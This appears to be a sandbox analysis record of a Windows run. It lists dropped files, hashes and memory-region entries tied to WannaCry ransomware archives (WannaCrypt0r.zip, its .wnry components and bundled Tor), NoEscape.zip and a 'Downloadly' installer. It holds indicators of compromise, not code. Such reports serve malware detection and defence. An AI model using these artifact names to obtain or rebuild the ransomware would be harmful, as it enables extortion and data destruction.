C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\Downloads\WannaCrypt0r.zip.crdownload

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\ca2a62fb-34e7-45cc-99c0-4fb65adc9dc0.tmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_finnish.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\t.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\s.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\r.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_vietnamese.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_turkish.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_swedish.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_spanish.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_slovak.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_russian.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_romanian.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_portuguese.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_polish.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_norwegian.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_latvian.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_korean.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_japanese.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_italian.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_indonesian.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_greek.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_german.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_french.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_filipino.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_english.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_dutch.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_danish.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_czech.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_croatian.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_chinese (traditional).wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_chinese (simplified).wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_bulgarian.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\c.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\b.wnry

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\tor.exe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

MD5 657ed1b9ac0c74717ea560e6c23eae3e
SHA1 6d20c145f3aff13693c61aaac2efbc93066476ef
SHA256 ff95275ab9f5eadda334244325d601245c05592144758c1015d67554af125570
SHA512 60b6682071ade61ae76eed2fe8fa702963c04261bd179c29eed391184d40dc376136d3346b3809b05c44fb59f31b0e9ab95f1e6b19e735234d1f0613720e532f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

MD5 bcf8a9566c19c82f4bdb43f53a912bab
SHA1 aedbcfb45eed11b7ad362b53ff32bacec9f932ee
SHA256 52c97dd2602b4d9ac70b61c3dd9b0f9869c5c211e2a4b52e94eda5e150349ae7
SHA512 cfec8603b3eecc261735ddb3d9f292f47e5e34761d73c33b8a1fa1efcf8e07b9b5595a28eac3b238842cf1f63a155b0376840f42ab22ad3186390bcfbc62adfb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021

MD5 8b2813296f6e3577e9ac2eb518ac437e
SHA1 6c8066353b4d463018aa1e4e9bb9bf2e9a7d9a86
SHA256 befb3b0471067ac66b93fcdba75c11d743f70a02bb9f5eef7501fa874686319d
SHA512 a1ed4d23dfbe981bf749c2008ab55a3d76e8f41801a09475e7e0109600f288aa20036273940e8ba70a172dec57eec56fe7c567cb941ba71edae080f2fdcc1e0c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026

MD5 063fe934b18300c766e7279114db4b67
SHA1 d7e71855cf6e8d1e7fbaa763223857f50cd1d4bd
SHA256 8745914e0214bcd9d2e6a841f0679a81084ef3fc3d99125876bee26653f4253e
SHA512 9d0dfc21306b3a56c2ecdf1265392271969e3765e161e117c8765125b34793e24458217cf6514b364f351f47e65baaaf5856be0d13406a789f844d6ba8c7075f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

MD5 9ddefb34cdc7433e68d58cfc54afd013
SHA1 2a74522efe35efe4956828eb2172a4f9a0e7499e
SHA256 a198b75825125d7755c874913ec2305b557810db78fc3ffabc6ed85b2fedf079
SHA512 7b27c3e6dd1653e1d526f1c070906f119816cfab7dcddd6f12e5367a652713a08c20c9e709f121893d7c2044eb60aa87fbf3dbb1533638e576819473ca469700

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023

MD5 668b709219a3bc003ac35038ad55daa8
SHA1 65d4bd0e7a79f6717d00656d3774c9cddce8c536
SHA256 075482464634359e34d7d49320b08882ce1f8c742904910caddcae0db6d86989
SHA512 6bf60d57cd41c555f4f2a205994690882d44da5617de36a144219983f71f6e06112d15816b138cbd7bd37b29b9802f009c3503204c7e2b8b0354b3b3ac16b941

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3f58e8855c08e01efc18a3580d8fdf61
SHA1 2a8384a25091699f978bd6d678d090e89f3df49a
SHA256 9aa5e80d255c9e49e9f95dec73533248f5a7fe3a8632a2cb780ef084adbb734b
SHA512 1da1b7d7b3e1f4c7a49ffe22f70cd79688d8c467e5e4e127a490386582437a17bbc294ae7adf210c780d7ce450bb640139268258912c61f54a80b8ab47131933

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000027

MD5 bc4836b104a72b46dcfc30b7164850f8
SHA1 390981a02ebaac911f5119d0fbca40838387b005
SHA256 0e0b0894faf2fc17d516cb2de5955e1f3ae4d5a8f149a5ab43c4e4c367a85929
SHA512 e96421dd2903edea7745971364f8913c2d6754138f516e97c758556a2c6a276ba198cdfa86eb26fe24a39259faff073d47ef995a82667fa7dee7b84f1c76c2b2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000028

MD5 2f3c7b5f9221520efbdb40dc21658819
SHA1 df12f010d51fe1214d9aca86b0b95fa5832af5fd
SHA256 3ba36c441b5843537507d844eca311044121e3bb7a5a60492a71828c183b9e99
SHA512 d9ed3dccd44e05a7fde2b48c8428057345022a3bcea32b5bdd42b1595e7d6d55f2018a2d444e82380b887726377ab68fa119027c24ac1dadc50d7918cc123d7b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002a

MD5 e80a1089da3f589b77b09cbe69e869da
SHA1 7a42bfa54718a4b4530a69bb6da757b93d2a70ec
SHA256 9f0e7b008e969ff0d42092795510889b1a7b4816fa2533a32353a2f35c12042d
SHA512 24a09fcfcf796d948a21c5d6b7646c1eec7f62bbae5eabc23b0d86cda5c10ced12ae4dbcc3ef6ac9c98eeacc83129609fc45e685ca923f3aae2f2882203e811c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d79b363d68b088a423507b949ba750d5
SHA1 8e4211d6123d17a1ccf0be6a5a86c0c3e6923227
SHA256 a52056df4561763db2230d87187c3fd05273df99930682fdba5ca8f5c845798b
SHA512 a03a555e9d163635aca8a0aa5bca79aad6f5a6969154f7ba4baae77452f77d3be8eeff70b5c41cbeaac2a7da33ad616b763ecf2fcd1ed41f1fa791af3e6dbedd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 1e7901515e88e44a0f726bfe401ebf07
SHA1 ca3ac6e45b7869701b6433e5c13d471f37c70459
SHA256 80380027d00a5a1e0011332f0dd9dec3bb3dbe886f190c3637d08e7f8fed98b2
SHA512 bcfc4e7fd7764877cf54fa79eddf222df364653fd5b888904467ada188d9eae3624561aafaad12d135a86c5f9d169128e3ace061be5fe3c87c8c25294b5930e5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe620f3d.TMP

MD5 5e657520a5ea6ee4749bd712e13106a0
SHA1 cef4cb28b18a48a67b06a5ec4e03ea1b01c5687b
SHA256 bb98354c6934b6f6abea0ad9630c54abecf42c3b0be39583e2a1fc81efebbe33
SHA512 e7f268f41102a7fb1e9484951c074eadfdf3acd795a73587acf7508866b0b1a865322aa7e338251b116d58970eb505b917eee7f1f29e22375dea7a3bbdd5b7a4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 d65244bd727fe31b90f0c2eab2588142
SHA1 0830bbbc8e015888c05f1a181a2f8743fa246131
SHA256 0afa2e55729178e771909ceed8894ba686549f91ef0cd7d0ef7ed7d71ae9d744
SHA512 0d974de88d0eb1a0df303774ad3ee533c47c9e22711679628f6b710bc75e75285d3629f8a5435a98a869b916c08cd2e5cedbbf5ccdb06930e6dacc232f7055f1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 5d6968e1ce16e2c4e9f068df0c77b4c6
SHA1 d25f0bf7be515e1b0bd0a4b93585e49306c8bc3f
SHA256 0ca7be8d64426cf26bf50a307c7d0f42b5ee4940aea4471eece69961b0031cbf
SHA512 b655705834ba5f7aa1fd6ff1f230966282e2c055149e0d56d3baeeae51ae7bd3db2b6de855833f5390f0817b9f96561d7928faee3a18d430871bb1194491c3fe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 a835eacc418e80d4407f3767cb7a98f6
SHA1 8ab45616dcd729a3f395c71bb3e4525f009fc146
SHA256 746d1e9c6b48d2ff4c7fa5cacfb2053833b5b7eda1140c445322545c1f2533d2
SHA512 4865b4174b954885bff3a6d696b78cc4ab62a3429ffcecb8b9a0f800164e66b94aa42e5807bb061596bed44db2059c6b52fc8fb549ca195aae0908cbfc311d71

C:\Users\Admin\Downloads\Downloadly.zip

MD5 0a0f5d4bbd7f1f262b515c241eaa6f23
SHA1 030a19704c38ea2235766b72769d39f78b9a8eec
SHA256 9d7dadfe03e2dd2225cd3c379e828fb61acc61bdfb1a2f5e39fe208e202ae921
SHA512 fc311a7ee859871f34205981084257f2b3e11074f11105bd7f67e25546319fb0cedf86c580458ab57793ccdf36f0bcdd732b6c95c4e3fc3e243e5961b2820b60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ac2b5197a59995303629b881143a6b35
SHA1 b546789601cd8138b4f8ce771eb24b788b0945a5
SHA256 3ae39e6309941be6a423b66a38898bc1dcc1fafc26f39657c6fd55d48e720091
SHA512 55a52bc07996d1d3b53f2cb4307d4c1fb3975fcb8d6c8d1a8e3c0fda0b09181d6e7feecaf209ab303bbb20068b357f0ebd5d8a59649869b89b670ec372aed451

memory/3048-3197-0x0000000000400000-0x00000000004CC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 58d5f9c7ecf8325a05a996baea0b59de
SHA1 ba39eb58e1ba71606b39fb05733f8ed58791d546
SHA256 494861d4afbdf435bb07b13540ea29cdeb839c23213d38ac3e1cdc866bb58d0f
SHA512 738192a66bd7ea1a0afad6d8356a29bf510e092f750517452b41edde25fb718c0164763a0450ca1287e76afb45b229e2e93266f810772ea84659cd5f4680217b

memory/2408-3209-0x0000000002560000-0x0000000002561000-memory.dmp

C:\Users\Admin\Programs\Downloadly\Downloadly.exe

MD5 c64463e64b12c0362c622176c404b6af
SHA1 7002acb1bc1f23af70a473f1394d51e77b2835e4
SHA256 140dcfc3bde8405d26cfe50e08de2a084fb3be7cf33894463a182e12001f5ce7
SHA512 facd1c639196d36981c89048c4e9ccf5f4e2a57b37efc4404af6cafb3ec98954fe5695b0d3a3ee200b849d45d3718b52cce0af48efba7c23b1f4613bcaa35c0a

memory/1740-3339-0x0000018BA59F0000-0x0000018BA5A74000-memory.dmp

memory/1740-3340-0x00007FF82C860000-0x00007FF82D322000-memory.dmp

memory/1740-3341-0x0000018BA76A0000-0x0000018BA76E6000-memory.dmp

memory/1740-3342-0x0000018BC01C0000-0x0000018BC01D0000-memory.dmp

memory/1740-3343-0x0000018BC02D0000-0x0000018BC02E0000-memory.dmp

memory/3048-3349-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/1740-3350-0x0000018BC1530000-0x0000018BC15E0000-memory.dmp

memory/1740-3351-0x0000018BC14D0000-0x0000018BC14F2000-memory.dmp

memory/1740-3353-0x0000018BC1490000-0x0000018BC1498000-memory.dmp

memory/1740-3354-0x0000018BC1620000-0x0000018BC1658000-memory.dmp

memory/1740-3355-0x0000018BC14A0000-0x0000018BC14AE000-memory.dmp

memory/1740-3368-0x0000018BC01C0000-0x0000018BC01D0000-memory.dmp

memory/2796-3371-0x0000000000400000-0x0000000000516000-memory.dmp

memory/1740-3369-0x0000018BC01C0000-0x0000018BC01D0000-memory.dmp

memory/4592-3374-0x00000000025E0000-0x00000000025E1000-memory.dmp

C:\Users\Admin\AppData\Local\Massive\usage\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Massive\usage\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

memory/1740-3454-0x0000018BC01C0000-0x0000018BC01D0000-memory.dmp

memory/2796-3456-0x0000000000400000-0x0000000000516000-memory.dmp

memory/1740-3457-0x0000018BC0D80000-0x0000018BC0D88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Update-f05ff7f4-69af-41fd-8644-e7e8675ce157\downloadly_installer.exe

MD5 ce8239c6118c4cf509b85848e6d85094
SHA1 696085331c75e328ef6e8785e302a39e713429cc
SHA256 2d3262cbc35e3b6be149d1534696d757066b961e531f391363a2aa2912784880
SHA512 ae97f3213272724c697d5788be2ca8f1d0b10bb5a467ce3969eac59d18117abebe9972a416187f54516bf67fbb0ae75811648a101f668543e3264b1b099509b4

memory/3104-3471-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/4388-3475-0x0000000002490000-0x0000000002491000-memory.dmp

memory/1740-3488-0x0000018BC0C80000-0x0000018BC0C92000-memory.dmp

memory/3276-3489-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/1740-3491-0x0000018BC0C70000-0x0000018BC0C7A000-memory.dmp

memory/1740-3492-0x0000018BC0CA0000-0x0000018BC0CA8000-memory.dmp

memory/1740-3494-0x0000018BC0CB0000-0x0000018BC0CB8000-memory.dmp

memory/2096-3498-0x00000000025C0000-0x00000000025C1000-memory.dmp

memory/1740-3497-0x00007FF82C860000-0x00007FF82D322000-memory.dmp

C:\Users\Admin\Programs\Downloadly\is-6T07P.tmp

MD5 8097152e93a43ead7dc59cc88ea73017
SHA1 b21d9f73ecf57174ce8ec5091e60c3a653f97ecd
SHA256 5a522e16c4b9be7d757585c811e2b7b4eab6592aed1fbc807d4154974b7bb98f
SHA512 d885a2ecba46c324c05d63b5482d604429556fe864202b1127866f2798ead67228390fb730d44ccef205c8103129d89d88a9541a4657d55c01373f8db50f7b23

memory/3276-3514-0x0000000000400000-0x00000000004CC000-memory.dmp

C:\Users\Admin\Programs\Downloadly\Downloadly.exe

MD5 9e1e1786225710dc73f330cc7f711603
SHA1 b9214d56f15254ca24706d71c1e003440067fd8c
SHA256 bd19ac814c4ff0e67a9e40e35df8abd7f12ffaa6ebefaa83344d553d7f007166
SHA512 6398a6a14c57210dc61ed1b79ead4898df2eb9cea00e431c39fc4fb9a5442c2dc83272a22ca1d0c7819c9b3a12316f08e09e93c2594d51d7e7e257f587a04bef

memory/240-3641-0x00000288F24C0000-0x00000288F2548000-memory.dmp

memory/240-3640-0x00007FF82C860000-0x00007FF82D322000-memory.dmp

memory/240-3642-0x00000288F4160000-0x00000288F41A6000-memory.dmp

memory/240-3643-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

memory/240-3644-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

memory/240-3645-0x00000288F41F0000-0x00000288F4200000-memory.dmp

memory/3104-3650-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/240-3651-0x00000288F60B0000-0x00000288F6160000-memory.dmp

memory/240-3665-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

memory/240-3664-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

memory/3400-3666-0x0000000000400000-0x0000000000516000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-D8DE2.tmp\_isetup\_setup64.tmp

MD5 e4211d6d009757c078a9fac7ff4f03d4
SHA1 019cd56ba687d39d12d4b13991c9a42ea6ba03da
SHA256 388a796580234efc95f3b1c70ad4cb44bfddc7ba0f9203bf4902b9929b136f95
SHA512 17257f15d843e88bb78adcfb48184b8ce22109cc2c99e709432728a392afae7b808ed32289ba397207172de990a354f15c2459b6797317da8ea18b040c85787e

memory/2096-3669-0x0000000002600000-0x0000000002601000-memory.dmp

memory/240-3685-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

memory/240-3684-0x00007FF82C860000-0x00007FF82D322000-memory.dmp

memory/240-3687-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a6157fb0435b890a958e7e1adac862b1
SHA1 b579b9fc8597ddbf1457797fefb70755df22a158
SHA256 dd7465d82fbf55d768013169a2e58d9d4638c5b38097e1038996b4362081fc2c
SHA512 0017407b90fab796298af2a762425dc3ba370326a2d1da310ff353ef93fb39f25a49c31a60eee2c46d8b85a6600fcccaefba8c4411cba1ff9c069b217d4f0000

memory/240-3706-0x00000288F4C80000-0x00000288F4C90000-memory.dmp

C:\Users\Admin\Downloads\NoEscape.zip

MD5 ef4fdf65fc90bfda8d1d2ae6d20aff60
SHA1 9431227836440c78f12bfb2cb3247d59f4d4640b
SHA256 47f6d3a11ffd015413ffb96432ec1f980fba5dd084990dd61a00342c5f6da7f8
SHA512 6f560fa6dc34bfe508f03dabbc395d46a7b5ba9d398e03d27dbacce7451a3494fbf48ccb1234d40746ac7fe960a265776cb6474cf513adb8ccef36206a20cbe9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\f6696a99-c74a-4613-85ac-40b737efb044.tmp

MD5 f3f4f23d8800acf13b4a81290665190e
SHA1 36ebed332c279faefbad32e1c9ff0c3e34b95f34
SHA256 47449584139e3d5e7534564a251317f24d20b84b3520c6b8071b613f99af9130
SHA512 e00574e06400203156e13f2ed290b367628e5c28f1ba6c56acf078749bdda0d0fcfddf1a1dc43233985a833a83006b422aedadb99b75ca57760cf8648e39c2ae

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 94bfc41916b70a8ccd5cd4003e14f80d
SHA1 a5e37e037e35b90a7ab0bb3f6e439fcf649f9b58
SHA256 897f1d5b45255182209c4cfb0555d1ec0ad74952d486cf65fc176766bebb9b10
SHA512 269a1128de7cd121481db977146f6ac0baf1d478a1086e1ae017619c050edb65d68110c90c9fd11da850659d61e4b32b74681426b31a698e716472dc0b9eb60d

C:\Users\Public\Desktop\ᔒ⭘༑ⲽ؞ᛎዐᖋᒩエ⊒ᴠ൨ᲢଈὭ⪦௪࢐✢෸

MD5 e49f0a8effa6380b4518a8064f6d240b
SHA1 ba62ffe370e186b7f980922067ac68613521bd51
SHA256 8dbd06e9585c5a16181256c9951dbc65621df66ceb22c8e3d2304477178bee13
SHA512 de6281a43a97702dd749a1b24f4c65bed49a2e2963cabeeb2a309031ab601f5ec488f48059c03ec3001363d085e8d2f0f046501edf19fafe7508d27e596117d4